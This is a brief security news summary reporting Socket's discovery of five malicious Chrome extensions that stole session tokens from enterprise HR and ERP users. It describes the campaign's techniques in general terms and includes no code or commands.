5 Malicious Chrome Extensions Enable Session Hijacking in Enterprise HR and ERP Systems

Socket's Threat Research Team uncovered a coordinated campaign involving five malicious Chrome extensions targeting enterprise HR and ERP platforms such as Workday, NetSuite, and SuccessFactors, aimed at stealing authentication tokens and enabling account takeovers. These extensions, including four under the "databycloud1104" name and one under "softwareaccess," collectively affect over 2,300 users and employ sophisticated techniques such as cookie exfiltration, DOM manipulation, and session hijacking. The campaign involves shared infrastructure, identical security tool detection lists, and complementary functionalities that prevent standard incident response actions, thus creating a persistent security threat. Despite presenting themselves as productivity tools, the extensions execute malicious activities like credential theft and blocking security pages while falsely claiming not to collect user data. The extensions employ anti-analysis mechanisms to evade detection and maintain control over compromised accounts, with ongoing investigations and takedown requests submitted to Google's Chrome Web Store security team.